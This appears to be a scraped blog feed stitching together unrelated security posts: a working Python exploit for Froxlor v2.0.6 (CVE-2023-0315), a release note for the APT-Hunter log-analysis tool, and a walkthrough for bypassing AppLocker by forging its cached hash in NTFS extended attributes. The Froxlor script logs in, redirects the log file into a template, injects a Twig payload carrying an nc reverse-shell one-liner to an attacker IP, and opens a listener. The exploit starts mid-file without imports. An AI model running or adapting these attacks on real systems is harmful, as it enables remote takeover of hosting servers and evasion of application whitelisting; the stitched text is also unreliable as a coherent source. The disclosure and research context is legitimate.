url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]

# One session for all requests so the login cookie is reused.
request = requests.session()


def login():
    login_info = {
        "loginname": username,
        "password": password,
        "send": "send",
        "dologin": ""
    }
    login_request = request.post(url+"/index.php", login_info, allow_redirects=False)
    # A successful login redirects to admin_index.php; a failed one may not
    # redirect at all, so use .get() to avoid a KeyError.
    location_header = login_request.headers.get("Location")
    return location_header == "admin_index.php"


def change_log_path():
    change_log_path_url = url + "/admin_settings.php?page=overview&part=logging"
    csrf_token_req = request.get(change_log_path_url)
    csrf_token_req_response = csrf_token_req.text
    soup = BeautifulSoup(csrf_token_req_response, "lxml")
    csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"])
    print("[+] Main CSRF token retrieved %s" % csrf_token)

    # The original dict listed "logger_enabled" twice ("0" then "1");
    # Python keeps only the last value, so only "1" is listed here.
    multipart_data = {
        "logger_enabled": (None, "1"),
        "logger_severity": (None, "2"),
        "logger_logtypes[]": (None, "file"),
        "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/footer.html.twig"),
        "logger_log_cron": (None, "0"),
        "csrf_token": (None, csrf_token),
        "page": (None, "overview"),
        "action": (None, ""),
        "send": (None, "send")
    }
    req = request.post(change_log_path_url, files=multipart_data)
    response = req.text
    if "The settings have been successfully saved." in response:
        print("[+] Changed log file path!")
        return True
    else:
        return False


def inject_template():
    admin_page_path = url + "/admin_index.php"
    csrf_token_req = request.get(admin_page_path)
    csrf_token_req_response = csrf_token_req.text
    soup = BeautifulSoup(csrf_token_req_response, "lxml")
    csrf_token = (soup.find("meta", {"name":"csrf-token"})["content"])

    # Reverse shell one-liner wrapped in the Twig expression.
    onliner = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f".format(ip, port)
    payload = "{{['%s']|filter('exec')}}" % onliner
    data = {
        "theme": payload,
        "csrf_token": csrf_token,
        "page": "change_theme",
        "send": "send",
        "dosave": "",
    }
    req = request.post(admin_page_path, data, allow_redirects=False)
    try:
        location_header = req.headers["Location"]
        if location_header == "admin_index.php":
            print("[+] Injected the payload successfully!")
    except KeyError:
        print("[-] Can't Inject payload :/")
        sys.exit()

    # Start the listener first, then request a page that renders the footer.
    handler_thread = Thread(target=connection_handler, args=(port,))
    handler_thread.start()
    print("[+] Triggering the payload ...")
    req2 = request.get(admin_page_path)


def connection_handler(port):
    print("[+] Listener started on port %s" % port)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", int(port)))
    s.listen(1)
    conn, addr = s.accept()
    print("[+] Connection received from %s" % addr[0])
    t.sock = conn
    print("[+] Heads up, incoming shell!!")
    t.interact()


if login():
    print("[+] Successfully Logged in!")
    index_url = url + "/admin_index.php"
    request.get(index_url)
    if change_log_path():
        inject_template()
else:
    print("[-] Can't login")
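The listener above relies on telnetlib, which was removed from the standard library in Python 3.13. As a hedged alternative, the sketch below relays data between the accepted socket and the terminal using only socket and threading. forward and interact are hypothetical helper names, and this is a minimal stand-in rather than a drop-in replacement for everything Telnet.interact() does.

```python
import socket
import sys
import threading
from typing import Callable


def forward(read_chunk: Callable[[], bytes], write_chunk: Callable[[bytes], object]) -> None:
    """Copy chunks from read_chunk() to write_chunk() until an empty read (EOF)."""
    while True:
        chunk = read_chunk()
        if not chunk:
            break
        write_chunk(chunk)


def interact(conn: socket.socket) -> None:
    """Relay stdin to the socket and the socket to stdout until the peer closes."""

    def to_stdout(chunk: bytes) -> None:
        sys.stdout.buffer.write(chunk)
        sys.stdout.buffer.flush()

    # Daemon thread: sends each line typed on stdin to the remote side.
    sender = threading.Thread(
        target=forward,
        args=(sys.stdin.buffer.readline, conn.sendall),
        daemon=True,
    )
    sender.start()
    # Main thread: prints whatever the remote side sends back.
    forward(lambda: conn.recv(4096), to_stdout)
```

In connection_handler, a call to interact(conn) could then take the place of the t.sock = conn and t.interact() pair.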

And we get this shell after running the exploit:

Vulnerability disclosure

The Froxlor team asked me to report the bug via huntr.dev. I reported it and was awarded a small appreciation bounty, and the Froxlor team issued a patch for this bug in version 2.0.8.

The post Froxlor v2.0.6 Remote Command Execution (CVE-2023-0315) appeared first on Shells.Systems.

The post APT-HUNTER V3.0 : Rebuilt with Multiprocessing and new features appeared first on Shells.Systems.

Since the last release I have been working on new features and on increasing processing speed for large numbers of Windows event log files, so I rebuilt the tool to use multiprocessing and added more features that will help you in your next investigation.

Download from here : https://github.com/ahmedkhlief/APT-Hunter/releases/tag/V3.0

APT-HUNTER V3.0 Features

- New use cases based on new attacks and incidents.

- More statistics and detections for new log sources (Group Policy, SMB Client, SMB Server).

- Rebuilt with multiprocessing to utilize available resources.

- Specify a start and end date to focus on a specific time period.

- Lightning-fast Regex Hunt that goes through tons of logs in minutes.

- New Object Access Report.

- New Process Execution Report.

- New Summary of Detection Results.

- New statistics sheet that includes the unique PowerShell commands executed on the systems.

- New statistics sheet for RDP client events, with event SIDs automatically resolved to users.

- New statistics sheet for executed PowerShell commands.

- You no longer need to brute-force the EventID 1029 hash to get the username.

- WinRM event SIDs are now automatically resolved to user names.

- New collected SID report that lists all discovered SIDs with their user names.

- New scoring system for PowerShell detections to let you focus on important events.

- APT-Hunter can now handle any number or size of Windows event logs.

- The hunting module now allows you to include specific event IDs to search.

- The hunting module now allows you to provide a file with a list of regexes.

Running APT-Hunter

You can check the report samples in the GitHub repo.


The post Bypassing AppLocker by abusing HashInfo appeared first on Shells.Systems.

This article is based mostly on the work of Grzegorz Tworek (@0gtweet).

I recently saw this tweet from Grzegorz Tworek (@0gtweet, who you really should be following if you aren’t already!) come across my timeline.

I had seen previous tweets referencing the AppLocker hash/signature cache and, having a CPD day, I thought I would take a closer look and see what worked and what didn’t. Probably fair to say that if something didn’t work, that would be on me rather than the source material.

Having a look at the https://github.com/gtworek/PSBits/tree/master/CopyEAs repository there isn’t a huge amount of material to go off (for someone new to it like me – once you get your head around it, then it actually is everything you need to know).

Righty then. Let’s dig down and see what we can find. Let’s start with NTFS EA – Wikipedia helpfully tells us Extended Attributes (EA) are file system features that enable users to associate computer files with metadata not interpreted by the filesystem, whereas regular attributes have a purpose strictly defined by the filesystem (such as permissions or records of creation and modification times). General documentation on EAs is actually quite sparse – the best resource I found giving an overview is the ever dependable SpecterOps : https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

EAs are like Alternate Data Streams (ADS), but with a data limit of ~65k on NTFS (the limit varies by file system; that figure is from the Linux implementation of EAs).

So how does AppLocker use these EAs and how do we abuse them to bypass it?

In my test environment I set up an AppLocker rule to allow a file with a certain hash

It is worth noting that this is a specific AppLocker hash, not a file hash

Querying the EAs of the file using fsutil shows that the AppLocker Hash is stored in $KERNEL.PURGE.APPID.HASHINFO

From what I can gather from the tools that Grzegorz released, we can write EAs but we can’t overwrite the $ prefixed entries. That is why his CopyEAs toolkit creates entries prefixed with a # and direct disk access is required to rename them.

So let’s PoC this up and see what we can do. I created a 20 MB VHD and mounted it as a test user. I placed a file, imaginatively called Malware.exe, on the mounted drive.

Prior to execution, no attributes were visible

Running it was prohibited via AppLocker

After running it we could see that some EAs had been populated

Our hash did not match the AppLocker rule according to the EA value on $KERNEL.PURGE.APPID.HASHINFO

Which can be confirmed from the command line

Now we have a couple of options at this point. We can add a #KERNEL.PURGE.APPID.HASHINFO with a ‘good’ hash value using the SetApplockerCache.exe that is part of the CopyEAs tool suite, as below:

Or we can just search and replace for the original hash value with the ‘good’ value. Unmounting the VHD and popping it into a hex editor we can search for the values we are looking for.

After replacing those hash values with the ‘good’ value, remounting the VHD and re-querying the values shows that the AppLocker hash cache now contains the ‘good’ values.
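The hex-editor step can also be scripted. The sketch below is a minimal illustration, assuming the VHD is unmounted, small enough to read into memory, and that the hash appears in the image as a contiguous byte sequence. replace_hash_bytes and the demo byte values are hypothetical placeholders, not values from my test environment.

```python
import tempfile
from pathlib import Path


def replace_hash_bytes(image_path: str, old_hash: bytes, new_hash: bytes) -> int:
    """Replace every occurrence of old_hash with new_hash in a raw image file.

    Returns the number of occurrences that were replaced.
    """
    if len(old_hash) != len(new_hash):
        # A different length would shift every byte after the match.
        raise ValueError("old and new hash must have the same length")
    path = Path(image_path)
    data = path.read_bytes()
    count = data.count(old_hash)
    if count:
        path.write_bytes(data.replace(old_hash, new_hash))
    return count


# Demo on a throwaway file with placeholder values (not real AppLocker hashes).
with tempfile.TemporaryDirectory() as tmp:
    image = Path(tmp) / "demo.img"
    bad, good = bytes.fromhex("aa" * 32), bytes.fromhex("bb" * 32)
    image.write_bytes(b"header" + bad + b"padding" + bad)
    print(replace_hash_bytes(str(image), bad, good))  # 2
    print(good in image.read_bytes())                 # True
```

Keeping the replacement the same length as the original matters: the rest of the file system structures in the image stay at the same offsets.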

So what happens if we run it?

We get our CS_Is_Dead_Sliver_Is_The_New_Hotness callback

This also worked for me on a USB stick, or any NTFS-formatted volume.

Big shout out to Grzegorz Tworek for https://github.com/gtworek/PSBits – you can literally lose days of your life digging a little deeper into the stuff he uncovers!